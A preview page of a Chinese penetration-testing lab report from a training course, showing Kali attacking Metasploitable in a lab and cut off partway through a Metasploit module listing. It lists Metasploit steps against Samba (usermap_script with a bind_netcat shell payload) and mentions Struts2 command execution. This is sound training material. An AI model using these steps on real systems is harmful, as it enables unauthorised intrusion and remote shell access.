2021年渗透测试实验报告(中国移动安全部).pdf

2021年渗透测试实验报告(中国移动安全部).pdf

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
渗透测试培训 3 月 13 日 第一天:主要实验总结 首先利用 struts2 漏洞 ,可以直接执行任意命令,取得主机控制权。 实验环境: KALI linux 作为攻击工具; owasp 作为靶机 2003 metaspoitable 实现能够成功访问 使用 metaspliot 完成对于靶机 samba 服务的攻击,获取 shell 权限 search samba 查找模块 Use multi/samba/usemap_script 选择渗透攻击模块 Show payloads 查看与该渗透模块相兼容的攻击载荷 Set payload cmd/unix/bind_netcat 选择 netcat 工具在渗透攻击成功后执行 shell Show options 查看需要设置的参数 Set RHOST 54 设置主机攻击主机 Exploit 启动攻击 1、首先安装 vm 虚拟机程序,开启 kali,owasp 和 metaspoitalbe 等工具和搭建环境,使得网络可达,网络配 置上选择 nat 模式,地址范围为 /24 2 、开启 kali 虚机,进入 root 模式, 首先进入 msfconsle,修改初始密码为 123456 msf 〉 passwd [*] exec: passwd 输入新的 UNIX 密码: 重新输入新的 UNIX 密码: passwd:已成功更新密码 然后寻找 samba 模块 msf search samba Matching Modules ================ Name Disclosure Date Rank Description auxiliary/admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversal auxiliary/dos/samba/lsa_addprivs_heap normal Samba lsa_io_privilege_set Heap Overflow auxiliary/dos/samba/lsa_transnames_heap normal Samba lsa_io_trans_names Heap Overflow auxiliary/dos/samba/read_nttrans_ea_list normal Samba read_nt

文档评论(0)

橙老师资料铺 + 关注
实名认证
内容提供者

精选资料欢迎下载

1亿VIP精品文档

相关文档